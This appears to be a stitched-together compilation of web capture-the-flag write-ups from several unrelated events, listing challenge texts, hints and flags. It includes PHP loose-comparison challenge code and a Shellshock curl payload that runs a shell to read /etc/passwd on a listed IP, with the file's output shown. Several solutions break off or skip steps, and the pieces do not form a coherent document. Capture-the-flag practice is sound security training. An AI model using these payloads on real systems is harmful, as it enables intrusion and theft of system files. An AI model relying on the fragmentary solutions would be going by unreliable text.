Bad JS
100
There is a bad JS which hides flag inside. Capture it.
Compute the MD5 hash. Flag is: MD5(127.0.0.1)
f528764d624db129b32c21fbca0cb8d6
UUTCTF{f528764d624db129b32c21fbca0cb8d6}
Web WarmUp
10
Literally, find the flag!
The flag is UUTCTF{P0SCon: Welcome to UUTCTF! Happy hacking ;)}.
Viewing the source of the linked page shows the flag.
Control You
Web201205 Only those who give us the flag are exempt from our control.
The flag is in <script>function stop() {if (flag.value === "actf{control_u_so_we_can't_control_you}") {document.body.style.background = "red";}}</script>
actf{control_u_so_we_can't_control_you}
If the hostname of the entered URL is localhost, the input is rejected. A quirk in PHP's parse_url() function can be used to make it misinterpret the hostname. Entering the URL as follows displays the flag.
Brokerboard
183
It's the year 1997 and the Internet is just heating up! :fire:
In order to get ahead of the curve, SIT Industries® has introduced its first Internet product: The Link Saver™. SIT Industries® has been very secretive about this product - even going so far as to hire Kernel Sanders® to test the security!
However, The Kernel discovered that The Link Saver had a little bit of an SSRF problem that allowed any user to fetch the code for The Link Saver™ from https://localhost/key and host it themselves :grimacing:. Fortunately, with a lil' parse_url magic, SIT Industries® PHP wizards have patched this finding from Kernel Sanders® and are keeping the code behind this wonderful site secure!
... or have they? :wink:
chal1.swampctf.com:1244
-= Created by andrewjkerr =-
The flag is flag{y0u_cANn0t_TRU5t_php}.
Just understand the code ;)
Challenge's URL: http://blackfoxs.org/radar/md5play
<?php
// Challenge source as served by the page (md5play).
if(!isset($_GET['md5'])){
    die(highlight_file(__FILE__));
}
// Input must be exactly 3 characters and not a numeric string.
if (isset($_GET['md5']) and strlen($_GET['md5']) == 3 and !is_numeric($_GET['md5'])){
    $md5=$_GET['md5'];
    // Loose (==) comparison between a float and the hash string.
    if (floatval($md5)==md5($md5)){
        die(highlight_file("flag.php"));
    }else{
        echo htmlspecialchars($md5)."!=",md5($md5);
    }
}else{
    die(highlight_file(__FILE__));
}
?>
<?php $flag='radar{s0m3_bug5_1s_fun}'; ?>
radar{s0m3_bug5_1s_fun}
The Game of Faces, welcomes you. In this era, where AIs generate a lot of faces, we would like you to contribute to the same by uploading your image. Thank you for contributing, to continue.
http://159.89.166.12:15000/
Open the URL. Checking the HTML source, there is a <form> element, but it is not rendered. So extract only the <form> element from the HTML source, as below, and display it in the browser.
<form action='http://159.89.166.12:15000/' method = "GET" target="resultFrame">Upload Your Profile Picture : <input type="file" name="profile_pic" ><input type="submit" value="Upload Image" name="submit"></form>
VGhlX3Njcm9sbF9zYXlzPXRoZV9uaWdodF9raW5nVlN2YWx5cmlhbi50eHQ=
The_scroll_says=the_night_kingVSvalyrian.txt
pctf{You_L00K_Wi3Rd_IN_H3R3}
Do prepare to see cookies lurking everywhere. http://159.89.166.12:13500/
bc54f4d60f1cec0f9a6cb70e13f2127a pc114d6a415b3d04db792ca7c0da0c7a55 tfb2984e12969ad3a3a2a4d334b8fb385a {c6f570c477ab64d17825ef2d2dfcb6fe4 0o988287f7a1eb966ffc4e19bdbdeec7c3 ki0d4896d431044c92de2840ed53b6fbbd 3sf355d719add62ceea8c150e5fbfae819 _@12eccbdd9b32918131341f38907cbbb5 re639307d281416ad0642faeaae1f098c4 _y96bc320e4d72edda450c7a9abc8a214f Umc716fb29298ad96a3b31757ec9755763 _b51de5514f3c808babd19f42217fcba49 Ut05cb7dc333ca611d0a8969704e39a9f0 _tbc781c76baf5589eef4fb7b9247b89a0 HEff108b961a844f859bd7c203b7366f8e y_2349277280263dff980b0c8a4a10674b @l0b1cdc9fe1f929e469c5a54ffe0b2ed5 s0364641d04574146d9f88001e66b4410f _rc758807125330006a4375357104f9a82 3vfcfdc12fb4030a8c8a2e19cf7b075926 Ea440c5c247c708c6e46783e47e3986889 L_97a7bf81a216e803adfed8bd013f4b85 @_c1d12de20210d8c1b35c367536e1c255 l0a8655da06c5080d3f1eb6af7b514e309 t}
pctf{c0oki3s_@re_yUm_bUt_tHEy_@ls0_r3vEaL_@_l0t}
We have developed an advanced on-board parameter tracking system; does it have any vulnerabilities?
We develop advanced board tracking system, is it vulnerable?
<html>
<head>
<style>body, pre {color: #7b7b7b;font: 300 16px/25px "Roboto",Helvetica,Arial,sans-serif;}</style>
<meta name="generator" content="vi2html">
</head>
<body>
</br>Welcome to control plane application of Aeroctf system.</br></br></br>
On a dashboard you can see loading our system</br></br>
Stats:</br>
<iframe frameborder=0 width=800 height=600 src="/cgi-bin/stats"></iframe>
</body>
</html>
$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://81.23.11.159:8080/cgi-bin/stats
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Aero{c58b51bee681ba3aa3971cef7aa26696}
Difficulty: easy
The flag is gigem{be3p-bOop_rob0tz_4-lyfe}.
gigsgigsgigsgigsgigs gigsgigsgigem{flag_in_gigsgigsgigsgigsgigsflaggigem(omitted)
(omitted)cookieSc00kiecookiecookiecookiecookiesgigem{continued == source_and_cookie{gigsgigemflaggigem(omitted)
gigem_continue=cookies}hax0r=flagflagflagflagflagflaggigs=all_the_cookiescookie=flagcookiegigemflagcookie
gigem{flag_in_source_and_cookies}